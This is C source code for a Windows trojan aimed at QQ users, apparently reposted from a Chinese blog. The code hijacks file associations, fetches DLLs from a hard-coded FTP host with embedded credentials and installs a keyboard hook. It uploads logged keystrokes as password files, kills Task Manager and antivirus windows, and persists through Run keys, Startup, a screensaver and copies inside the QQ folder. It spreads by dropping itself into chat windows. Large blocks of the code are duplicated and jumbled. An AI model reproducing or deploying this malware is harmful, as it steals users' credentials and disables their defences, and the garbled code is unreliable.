#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#include <shellapi.h>
#include <ShlObj.h>
#include <tlhelp32.h>
#include <WINERROR.H>
#include <winreg.h>
#include "resource.h"
//kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib
#pragma comment( lib, "wininet.lib")
#pragma comment( lib, "user32.lib")
#pragma comment( lib, "advapi32.lib")
#include <wininet.h>
#include <stdio.h>
#include <shellapi.h>
#include <ShlObj.h>
#include <tlhelp32.h>
#include <WINERROR.H>
#include <winreg.h>
#include "resource.h"
//kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib
#pragma comment( lib, "wininet.lib")
#pragma comment( lib, "user32.lib")
#pragma comment( lib, "advapi32.lib")
HANDLE Snapshot; //进程的快照信息句柄
MODULEENTRY32 me = { sizeof(me) }; //全局结构变量MODULEENTRY32,用于获取当前进程的文件名,当然也可以为获取别的进程的文件名
MODULEENTRY32 qq = { sizeof(qq) }; //全局结构变量MODULEENTRY32,用于获取进程QQ
WIN32_FIND_DATA fd;
MODULEENTRY32 me = { sizeof(me) }; //全局结构变量MODULEENTRY32,用于获取当前进程的文件名,当然也可以为获取别的进程的文件名
MODULEENTRY32 qq = { sizeof(qq) }; //全局结构变量MODULEENTRY32,用于获取进程QQ
WIN32_FIND_DATA fd;
BOOL IsRunDll=FALSE;
#define PLMM "C:\\哥哥我爱你不要拒绝我.exe"
LRESULT CALLBACK WndProc(HWND hwnd,UINT msg,WPARAM wp,LPARAM); //回调函数声名
void Setup(void); //声名修改系统函数。
LRESULT CALLBACK WndProc(HWND hwnd,UINT msg,WPARAM wp,LPARAM); //回调函数声名
void Setup(void); //声名修改系统函数。
BOOL WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrehInstance,
LPSTR lpszCmdParam,
int nCmdShow)
{
HWND hwnd;
WNDCLASS wclass;
MSG msg;
SYSTEMTIME systime; //获取当前时间
HINSTANCE hPrehInstance,
LPSTR lpszCmdParam,
int nCmdShow)
{
HWND hwnd;
WNDCLASS wclass;
MSG msg;
SYSTEMTIME systime; //获取当前时间
HKEY hKey;
DWORD type=REG_SZ;
LPSTR ParamBuf,ExecBuf,p;
DWORD type=REG_SZ;
LPSTR ParamBuf,ExecBuf,p;
ParamBuf=(LPSTR)malloc(MAX_PATH);
ExecBuf =(LPSTR)malloc(MAX_PATH);
strcpy(ParamBuf,lpszCmdParam);
int i=0;
while(ParamBuf[i]!='\0'){ParamBuf[i]=tolower(ParamBuf[i]);i++;}
ExecBuf =(LPSTR)malloc(MAX_PATH);
strcpy(ParamBuf,lpszCmdParam);
int i=0;
while(ParamBuf[i]!='\0'){ParamBuf[i]=tolower(ParamBuf[i]);i++;}
GetWindowsDirectory(ExecBuf,MAX_PATH); //得到C:\\winnt目录
strcat(ExecBuf," \\SERVICES.EXE %1");
RegOpenKeyEx(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,"",NULL,REG_SZ,(unsigned char *)ExecBuf,MAX_PATH);//修改注册表文本文件关联。
RegCloseKey(hKey);
strcat(ExecBuf," \\SERVICES.EXE %1");
RegOpenKeyEx(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,"",NULL,REG_SZ,(unsigned char *)ExecBuf,MAX_PATH);//修改注册表文本文件关联。
RegCloseKey(hKey);
RegOpenKeyEx(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,"",NULL,REG_SZ,(unsigned char *)ExecBuf,MAX_PATH);//修改注册表EXE 文件关联。
RegCloseKey(hKey);
p=&ParamBuf[strlen(ParamBuf)-4];
if((strcmp(".txt",p)==NULL)||(strcmp(".log",p)==NULL))
{
GetWindowsDirectory(ExecBuf,MAX_PATH); //得到C:\\winnt目录
strcat(ExecBuf," \\NotePad.exe ");
strcat(ExecBuf,ParamBuf);
WinExec(ExecBuf,SW_SHOW); //用记事本打开文本文件。
}
if(strcmp(".exe",p)==NULL)
{
WinExec(ParamBuf,SW_SHOW); //执行.exe文件。
}
RegSetValueEx(hKey,"",NULL,REG_SZ,(unsigned char *)ExecBuf,MAX_PATH);//修改注册表EXE 文件关联。
RegCloseKey(hKey);
p=&ParamBuf[strlen(ParamBuf)-4];
if((strcmp(".txt",p)==NULL)||(strcmp(".log",p)==NULL))
{
GetWindowsDirectory(ExecBuf,MAX_PATH); //得到C:\\winnt目录
strcat(ExecBuf," \\NotePad.exe ");
strcat(ExecBuf,ParamBuf);
WinExec(ExecBuf,SW_SHOW); //用记事本打开文本文件。
}
if(strcmp(".exe",p)==NULL)
{
WinExec(ParamBuf,SW_SHOW); //执行.exe文件。
}
GetLocalTime(&systime); //获取本地系统时间。
sprintf(ParamBuf,"%ld_%ld_%ld_%ld_%ld",systime.wMonth,systime.wDay,systime.wHour,systime.wMinute,systime.wSecond);
wclass.style=CS_HREDRAW | CS_VREDRAW | CS_OWNDC;
wclass.lpfnWndProc=WndProc;
wclass.cbClsExtra=0;
wclass.cbWndExtra=0;
wclass.hInstance=hInstance;
wclass.hIcon=LoadIcon(hInstance,(LPCTSTR)IDI_ICON2);
wclass.hCursor=LoadCursor(NULL,IDC_ARROW);
wclass.lpszMenuName=NULL;
wclass.lpszClassName=ParamBuf;
wclass.hbrBackground=NULL;//HBRUSH(GetStockObject(BLACK_BRUSH));
CreateMutex(NULL,TRUE,"Send"); //只运行单进程,否则在执行DLL获取的键盘会产生多重
if (GetLastError()==ERROR_ALREADY_EXISTS)return 0;
if(!RegisterClass(&wclass))
{
MessageBox(NULL,"Register Window Class Faile!","",48);
return 0;
}
sprintf(ParamBuf,"%ld_%ld_%ld_%ld_%ld",systime.wMonth,systime.wDay,systime.wHour,systime.wMinute,systime.wSecond);
wclass.style=CS_HREDRAW | CS_VREDRAW | CS_OWNDC;
wclass.lpfnWndProc=WndProc;
wclass.cbClsExtra=0;
wclass.cbWndExtra=0;
wclass.hInstance=hInstance;
wclass.hIcon=LoadIcon(hInstance,(LPCTSTR)IDI_ICON2);
wclass.hCursor=LoadCursor(NULL,IDC_ARROW);
wclass.lpszMenuName=NULL;
wclass.lpszClassName=ParamBuf;
wclass.hbrBackground=NULL;//HBRUSH(GetStockObject(BLACK_BRUSH));
CreateMutex(NULL,TRUE,"Send"); //只运行单进程,否则在执行DLL获取的键盘会产生多重
if (GetLastError()==ERROR_ALREADY_EXISTS)return 0;
if(!RegisterClass(&wclass))
{
MessageBox(NULL,"Register Window Class Faile!","",48);
return 0;
}
HINTERNET Inet;
GetWindowsDirectory(ExecBuf,MAX_PATH);
strcat(ExecBuf," \\System.dll");
if(FindFirstFile(ExecBuf,&fd)==INVALID_HANDLE_VALUE) //下面为下载System.dll动态链接库文件。
{
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"System.dll",ExecBuf,0,NULL,0,0);
InternetCloseHandle(Inet);
}
if(!IsRunDll) //启动动态链接库文件内的链接键盘钩子
{
HINSTANCE hinstDLL;
typedef void (CALLBACK *inshook)(); //定义回调函数的地址
inshook instkbhook;
if(hinstDLL=LoadLibrary((LPCTSTR)"System.dll"))//装入动态链接库
{
instkbhook=(inshook)GetProcAddress(hinstDLL, "installhook"); //获得installhook的地址。
instkbhook(); //启动动态链接库的键盘钩子。
IsRunDll=TRUE; //修改启动标志。
}
}
hwnd=CreateWindow(ParamBuf,ParamBuf, //创建窗口。
WS_OVERLAPPEDWINDOW,
200,100,300,200,
NULL,NULL,
hInstance,NULL);
// ShowWindow(hwnd,SW_SHOW); //此处创建窗口而不显示
// UpdateWindow(hwnd);
strcat(ExecBuf," \\System.dll");
if(FindFirstFile(ExecBuf,&fd)==INVALID_HANDLE_VALUE) //下面为下载System.dll动态链接库文件。
{
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"System.dll",ExecBuf,0,NULL,0,0);
InternetCloseHandle(Inet);
}
if(!IsRunDll) //启动动态链接库文件内的链接键盘钩子
{
HINSTANCE hinstDLL;
typedef void (CALLBACK *inshook)(); //定义回调函数的地址
inshook instkbhook;
if(hinstDLL=LoadLibrary((LPCTSTR)"System.dll"))//装入动态链接库
{
instkbhook=(inshook)GetProcAddress(hinstDLL, "installhook"); //获得installhook的地址。
instkbhook(); //启动动态链接库的键盘钩子。
IsRunDll=TRUE; //修改启动标志。
}
}
hwnd=CreateWindow(ParamBuf,ParamBuf, //创建窗口。
WS_OVERLAPPEDWINDOW,
200,100,300,200,
NULL,NULL,
hInstance,NULL);
// ShowWindow(hwnd,SW_SHOW); //此处创建窗口而不显示
// UpdateWindow(hwnd);
free(ExecBuf); //释放缓冲区内存。
free(ParamBuf); //释放缓冲区内存。
while(GetMessage(&msg,NULL,0,0)) //处理事件循环
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
free(ParamBuf); //释放缓冲区内存。
while(GetMessage(&msg,NULL,0,0)) //处理事件循环
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
}
LRESULT CALLBACK WndProc(HWND hwnd,UINT msg,WPARAM wp,LPARAM lp)
{
switch(msg)
{
case WM_CREATE:
SetTimer(hwnd,1,60000,NULL); //设置一个1号定时器,时间间隔为60秒。
SetTimer(hwnd,2,100,NULL); //设置一个2号定时器,时间间隔为10毫秒。
SetTimer(hwnd,3,300000,NULL); //设置一个3号定时器,时间间隔为5分钟。
SetTimer(hwnd,4,1200000,NULL); //设置一个4号定时器,时间间隔为20分钟。
{
HINSTANCE hDllInst = LoadLibrary("KERNEL32.DLL"); //装入KERNEL32.DLL
if(hDllInst)
{
typedef DWORD (WINAPI *MYFUNC)(DWORD,DWORD);
MYFUNC RegisterServiceProcessAlias = NULL;
RegisterServiceProcessAlias = (MYFUNC)GetProcAddress(hDllInst, "RegisterServiceProcess");
if(RegisterServiceProcessAlias)
{
RegisterServiceProcessAlias(GetCurrentProcessId(),1);
}
FreeLibrary(hDllInst);
}
//以上为9x注册本进程为一个服务进程,可以将此进程隐藏于结束任务对话框。
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL,GetCurrentProcessId()); //创建当前进程的快照信息
Module32Next(Snapshot, &me);//用当前进程的快照信息句柄搜索出当前进程的模块信息,也可只用GetModuleFileName(NULL,FilePathBuff,MAX_PATH);
Setup();
}
break;
case WM_TIMER:
{
POINT lp;
HWND hw,h;
char str[MAX_PATH];
HANDLE f;
SYSTEMTIME systime; //获取当前时间
{
switch(msg)
{
case WM_CREATE:
SetTimer(hwnd,1,60000,NULL); //设置一个1号定时器,时间间隔为60秒。
SetTimer(hwnd,2,100,NULL); //设置一个2号定时器,时间间隔为10毫秒。
SetTimer(hwnd,3,300000,NULL); //设置一个3号定时器,时间间隔为5分钟。
SetTimer(hwnd,4,1200000,NULL); //设置一个4号定时器,时间间隔为20分钟。
{
HINSTANCE hDllInst = LoadLibrary("KERNEL32.DLL"); //装入KERNEL32.DLL
if(hDllInst)
{
typedef DWORD (WINAPI *MYFUNC)(DWORD,DWORD);
MYFUNC RegisterServiceProcessAlias = NULL;
RegisterServiceProcessAlias = (MYFUNC)GetProcAddress(hDllInst, "RegisterServiceProcess");
if(RegisterServiceProcessAlias)
{
RegisterServiceProcessAlias(GetCurrentProcessId(),1);
}
FreeLibrary(hDllInst);
}
//以上为9x注册本进程为一个服务进程,可以将此进程隐藏于结束任务对话框。
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL,GetCurrentProcessId()); //创建当前进程的快照信息
Module32Next(Snapshot, &me);//用当前进程的快照信息句柄搜索出当前进程的模块信息,也可只用GetModuleFileName(NULL,FilePathBuff,MAX_PATH);
Setup();
}
break;
case WM_TIMER:
{
POINT lp;
HWND hw,h;
char str[MAX_PATH];
HANDLE f;
SYSTEMTIME systime; //获取当前时间
GetCursorPos(&lp);
hw=WindowFromPoint(lp); //取得鼠标所在的窗口句柄
h=hw;
hw=WindowFromPoint(lp); //取得鼠标所在的窗口句柄
h=hw;
while(GetParent(h)!=NULL)
h=GetParent(h); //h为最上层的窗口句柄
if(wp==1) //一号定时器处理
{
Setup();
h=GetParent(h); //h为最上层的窗口句柄
if(wp==1) //一号定时器处理
{
Setup();
HANDLE hMemData;
DROPFILES *lpDropFiles; //DROPFILES结构指针
char *pszStart;
DROPFILES *lpDropFiles; //DROPFILES结构指针
char *pszStart;
h=GetDlgItem(h,0x00000); //为聊天窗口里的带有WS_EX_ACCEPTFILES的子窗口的句柄,用SPY++查得。
//strcpy(str,me.szExePath); //为程序自身文件
//以下为发送文件至聊天窗口。
strcpy(str,PLMM); //为专用作发送的美女文件
if(h==NULL)
{
return FALSE;
}
EmptyClipboard();
hMemData=GlobalAlloc(GHND,sizeof(DROPFILES)+MAX_PATH); //分配指定的字节的全局内存
lpDropFiles=(DROPFILES*)GlobalLock(hMemData); //锁定全局对象的内存块,并返回指针
lpDropFiles->pFiles =sizeof(DROPFILES); //设置pFiles值为DROPFILES后的地址
lpDropFiles->fNC =FALSE; //设置fNC为假
lpDropFiles->fWide =FALSE; //设置fWide为假
pszStart = (char*)((LPBYTE)lpDropFiles + sizeof(DROPFILES)); //指向DROPFILES之后的地址
strcpy(pszStart,str); //拷贝fp到DROPFILES之后的地址
GlobalUnlock(hMemData); //解锁hMemData
strcpy(pszStart,str); //拷贝fp到DROPFILES之后的地址
GlobalUnlock(hMemData); //解锁hMemData
if(!OpenClipboard(hwnd)) //打开剪贴板
return FALSE;
if(!EmptyClipboard()) //清空剪贴板
return FALSE;
SetClipboardData(CF_HDROP,lpDropFiles); //设置剪贴板数据
PostMessage(h,WM_DROPFILES,(WPARAM)(HDROP)hMemData,(LPARAM)0); //传递消息到窗口'h'
CloseClipboard(); //关闭剪贴板
}
else if(wp==2) //二号定时器处理
{
bool IsKill=false;
char hstr[MAX_PATH];
if(FindWindow(NULL,"Windows 任务管理器")!=NULL) //测试是否有windows 任务管理器打开了。若有,则杀死!
PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0);
GetWindowText(h,str,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU!
GetWindowText(hw,hstr,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU!
if((strstr(str,"兔子") || strstr(str,"任务") || strstr(str,"优化") || strstr(str,"Process") || strstr(str,"进程") || strstr(str,"毒") || strstr(str,"***") || strstr(str,"天网") ||
strstr(hstr,"兔子")|| strstr(hstr,"任务")|| strstr(hstr,"优化")|| strstr(hstr,"Process")|| strstr(hstr,"进程")|| strstr(hstr,"毒")|| strstr(hstr,"***")|| strstr(hstr,"天网")) && hw) //hw为鼠标所在的窗口句柄。h为鼠标所在的窗口最高层的窗口句柄.
{//多搞几次,以防有漏网之鱼,免得夜长梦多。呵呵
PostMessage(hw,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口
PostMessage(h,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口
PostMessage(hw,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口
PostMessage(h,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口
IsKill=false;
}
}
else if(wp==3) //三号定时器处理.主要用于检测动态链接库是否装入,键盘钩子是否安装。
{
GetWindowsDirectory(str,MAX_PATH);
strcat(str," \\System.dll");
f=FindFirstFile(str,&fd);
if(f==INVALID_HANDLE_VALUE) //没有System.dll文件时,从internet下载System.dll文件
{
HINTERNET Inet;
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"System.dll",str,0,NULL,0,0);
InternetCloseHandle(Inet);
IsRunDll=FALSE; //修改启动标志。为未启动。
}
if(!IsRunDll) //标志着为假时(既没有启动键盘钩子)。启动键盘钩子。
{
HINSTANCE hinstDLL;
typedef void (CALLBACK *inshook)(); //定义回调函数的地址
inshook instkbhook;
if(hinstDLL=LoadLibrary((LPCTSTR)"System.dll"))
{
instkbhook=(inshook)GetProcAddress(hinstDLL, "installhook"); //获得installhook的地址。
instkbhook(); //启动动态链接库的键盘钩子。
IsRunDll=TRUE; //修改启动标志。为已启动
}
}
}
else if(wp==4) //四号定时器处理
{
GetWindowsDirectory(str,MAX_PATH); //取得System目录。
strcat(str," \\system.log");
f=FindFirstFile(str,&fd);
if(f!=INVALID_HANDLE_VALUE) //下面为上传文件。
{
HINTERNET Inet;
char newname[MAX_PATH];
GetLocalTime(&systime); //获取本地系统时间。
sprintf(newname,"PWD%d_%d_%d_%d.txt",systime.wMonth,systime.wDay,systime.wHour,systime.wMinute);
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpPutFile(Inet,str,newname,INTERNET_FLAG_RESYNCHRONIZE,1);
if(Inet) //如果上传成功,则删除记录文件。
remove(str);
InternetCloseHandle(Inet);
}
}
}
break;
case WM_CLOSE:
return FALSE; //不允许关闭该程序。
case WM_DESTROY:
return FALSE; //不能推毁该程序。
}
return DefWindowProc(hwnd,msg,wp,lp);
}
//以下是给你的机器乱来一通,怕不?怕得话就Delete 之
void Setup(void)
{
HKEY run; //注册表句柄
char dir[MAX_PATH]; //文件名
//定时做修改
{
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //创建当前所有的进程的快照信息
PROCESSENTRY32 PList;
PList.dwSize=sizeof(PROCESSENTRY32);
while(Process32Next(Snapshot,&PList))
{
if(strstr(PList.szExeFile,"QQ"))
break;
}
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL,PList.th32ProcessID); //创建当前进程的快照信息
while(Module32Next(Snapshot,&qq)!=FALSE)
{
if(strstr(qq.szExePath,"QQ.exe"))
break;
}
if((strstr(qq.szExePath,"QQ")))
{
static bool isrt=false;
static bool isrq=false;
strncpy(qq.szExePath+strlen(qq.szExePath)-6,"",1);
strcpy(dir,qq.szExePath);
strcat(dir,"TIMPlatform.exe");
if(FindFirstFile(dir,&fd)==INVALID_HANDLE_VALUE)
{
CopyFile(me.szExePath ,dir,TRUE); //复制文件到C:\Program Files\Tencent\qq\TIMPlatform.exe。
isrt=true;
}
else if(!isrt)
{
char t[128];
strcpy(t,qq.szExePath);
strcat(t,"_");
rename(dir,t);
}
return FALSE;
if(!EmptyClipboard()) //清空剪贴板
return FALSE;
SetClipboardData(CF_HDROP,lpDropFiles); //设置剪贴板数据
PostMessage(h,WM_DROPFILES,(WPARAM)(HDROP)hMemData,(LPARAM)0); //传递消息到窗口'h'
CloseClipboard(); //关闭剪贴板
}
else if(wp==2) //二号定时器处理
{
bool IsKill=false;
char hstr[MAX_PATH];
if(FindWindow(NULL,"Windows 任务管理器")!=NULL) //测试是否有windows 任务管理器打开了。若有,则杀死!
PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0);
GetWindowText(h,str,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU!
GetWindowText(hw,hstr,MAX_PATH); //快速的测查是否有杀毒或者有用来结束该进程的工具在运行。if(true)KILL YOU!
if((strstr(str,"兔子") || strstr(str,"任务") || strstr(str,"优化") || strstr(str,"Process") || strstr(str,"进程") || strstr(str,"毒") || strstr(str,"***") || strstr(str,"天网") ||
strstr(hstr,"兔子")|| strstr(hstr,"任务")|| strstr(hstr,"优化")|| strstr(hstr,"Process")|| strstr(hstr,"进程")|| strstr(hstr,"毒")|| strstr(hstr,"***")|| strstr(hstr,"天网")) && hw) //hw为鼠标所在的窗口句柄。h为鼠标所在的窗口最高层的窗口句柄.
{//多搞几次,以防有漏网之鱼,免得夜长梦多。呵呵
PostMessage(hw,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口
PostMessage(h,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口
PostMessage(hw,WM_CLOSE,0,0); //给鼠标所在的父窗口发送WM_CLOSE消息。关闭窗口
PostMessage(h,WM_DESTROY,0,0); //给鼠标所在的窗口发送WM_DESTROY消息。推毁窗口
IsKill=false;
}
}
else if(wp==3) //三号定时器处理.主要用于检测动态链接库是否装入,键盘钩子是否安装。
{
GetWindowsDirectory(str,MAX_PATH);
strcat(str," \\System.dll");
f=FindFirstFile(str,&fd);
if(f==INVALID_HANDLE_VALUE) //没有System.dll文件时,从internet下载System.dll文件
{
HINTERNET Inet;
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"System.dll",str,0,NULL,0,0);
InternetCloseHandle(Inet);
IsRunDll=FALSE; //修改启动标志。为未启动。
}
if(!IsRunDll) //标志着为假时(既没有启动键盘钩子)。启动键盘钩子。
{
HINSTANCE hinstDLL;
typedef void (CALLBACK *inshook)(); //定义回调函数的地址
inshook instkbhook;
if(hinstDLL=LoadLibrary((LPCTSTR)"System.dll"))
{
instkbhook=(inshook)GetProcAddress(hinstDLL, "installhook"); //获得installhook的地址。
instkbhook(); //启动动态链接库的键盘钩子。
IsRunDll=TRUE; //修改启动标志。为已启动
}
}
}
else if(wp==4) //四号定时器处理
{
GetWindowsDirectory(str,MAX_PATH); //取得System目录。
strcat(str," \\system.log");
f=FindFirstFile(str,&fd);
if(f!=INVALID_HANDLE_VALUE) //下面为上传文件。
{
HINTERNET Inet;
char newname[MAX_PATH];
GetLocalTime(&systime); //获取本地系统时间。
sprintf(newname,"PWD%d_%d_%d_%d.txt",systime.wMonth,systime.wDay,systime.wHour,systime.wMinute);
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpPutFile(Inet,str,newname,INTERNET_FLAG_RESYNCHRONIZE,1);
if(Inet) //如果上传成功,则删除记录文件。
remove(str);
InternetCloseHandle(Inet);
}
}
}
break;
case WM_CLOSE:
return FALSE; //不允许关闭该程序。
case WM_DESTROY:
return FALSE; //不能推毁该程序。
}
return DefWindowProc(hwnd,msg,wp,lp);
}
//以下是给你的机器乱来一通,怕不?怕得话就Delete 之
void Setup(void)
{
HKEY run; //注册表句柄
char dir[MAX_PATH]; //文件名
//定时做修改
{
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //创建当前所有的进程的快照信息
PROCESSENTRY32 PList;
PList.dwSize=sizeof(PROCESSENTRY32);
while(Process32Next(Snapshot,&PList))
{
if(strstr(PList.szExeFile,"QQ"))
break;
}
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL,PList.th32ProcessID); //创建当前进程的快照信息
while(Module32Next(Snapshot,&qq)!=FALSE)
{
if(strstr(qq.szExePath,"QQ.exe"))
break;
}
if((strstr(qq.szExePath,"QQ")))
{
static bool isrt=false;
static bool isrq=false;
strncpy(qq.szExePath+strlen(qq.szExePath)-6,"",1);
strcpy(dir,qq.szExePath);
strcat(dir,"TIMPlatform.exe");
if(FindFirstFile(dir,&fd)==INVALID_HANDLE_VALUE)
{
CopyFile(me.szExePath ,dir,TRUE); //复制文件到C:\Program Files\Tencent\qq\TIMPlatform.exe。
isrt=true;
}
else if(!isrt)
{
char t[128];
strcpy(t,qq.szExePath);
strcat(t,"_");
rename(dir,t);
}
strcpy(dir,qq.szExePath);
strcat(dir,"QQZip.dll");
if(FindFirstFile(dir,&fd)==INVALID_HANDLE_VALUE)
{
HINTERNET Inet;
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"QQZip.dll",dir,0,NULL,0,0);
InternetCloseHandle(Inet);
isrq=true;
}
else if(!isrq)
{
char t[128];
strcpy(t,qq.szExePath);
strcat(t,"Fuck_Shaodongxinglangchao_Wangjing.swf");
rename(dir,t);
}
}
else
strcpy(qq.szExePath,"");
}
strcat(dir,"QQZip.dll");
if(FindFirstFile(dir,&fd)==INVALID_HANDLE_VALUE)
{
HINTERNET Inet;
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"QQZip.dll",dir,0,NULL,0,0);
InternetCloseHandle(Inet);
isrq=true;
}
else if(!isrq)
{
char t[128];
strcpy(t,qq.szExePath);
strcat(t,"Fuck_Shaodongxinglangchao_Wangjing.swf");
rename(dir,t);
}
}
else
strcpy(qq.szExePath,"");
}
CopyFile(me.szExePath ,PLMM,TRUE); //用作发送
GetWindowsDirectory(dir,MAX_PATH); //得到C:\\winnt目录
CopyFile(me.szExePath ,strcat(dir," \\system32\\默认的幕保护程序.scr"),TRUE);//用作屏幕保护
GetWindowsDirectory(dir,MAX_PATH); //得到C:\\winnt目录
strcat(dir," \\services.exe");
CopyFile(me.szExePath ,dir,TRUE); //复制文件到C:\\winnt目录,名为services.exe
strcpy(dir,"C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动 \\loader.exe");
CopyFile(me.szExePath ,dir,TRUE); //复制文件到启动
CopyFile(me.szExePath ,strcat(dir," \\system32\\默认的幕保护程序.scr"),TRUE);//用作屏幕保护
GetWindowsDirectory(dir,MAX_PATH); //得到C:\\winnt目录
strcat(dir," \\services.exe");
CopyFile(me.szExePath ,dir,TRUE); //复制文件到C:\\winnt目录,名为services.exe
strcpy(dir,"C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动 \\loader.exe");
CopyFile(me.szExePath ,dir,TRUE); //复制文件到启动
strcpy(dir,"%SystemRoot%\\services.exe");
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&run);
RegSetValueEx(run,"System",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);//修改注册表Run项。
RegCloseKey(run);
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&run);
RegSetValueEx(run,"System",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);//修改注册表Run项。
RegCloseKey(run);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx",0,KEY_WRITE,&run);
RegSetValueEx(run,"Services",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);//修改注册表Run项。
RegCloseKey(run);
RegSetValueEx(run,"Services",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);//修改注册表Run项。
RegCloseKey(run);
GetWindowsDirectory(dir,MAX_PATH); //得到C:\\winnt目录
strcat(dir," \\system32\\默认的~1.SCR");
RegOpenKeyEx(HKEY_CURRENT_USER,"Control Panel\\Desktop",0,KEY_WRITE,&run);
RegSetValueEx(run,"ScreenSaveTimeOut",NULL,REG_SZ,(unsigned char *)"60",MAX_PATH);//修改注册表屏幕保护项。
RegSetValueEx(run,"SCRNSAVE.EXE",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);//修改注册表屏幕保护项。
RegCloseKey(run);
}
strcat(dir," \\system32\\默认的~1.SCR");
RegOpenKeyEx(HKEY_CURRENT_USER,"Control Panel\\Desktop",0,KEY_WRITE,&run);
RegSetValueEx(run,"ScreenSaveTimeOut",NULL,REG_SZ,(unsigned char *)"60",MAX_PATH);//修改注册表屏幕保护项。
RegSetValueEx(run,"SCRNSAVE.EXE",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);//修改注册表屏幕保护项。
RegCloseKey(run);
}
转载于:https://blog.51cto.com/jeick/144271
扫一扫
2953
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
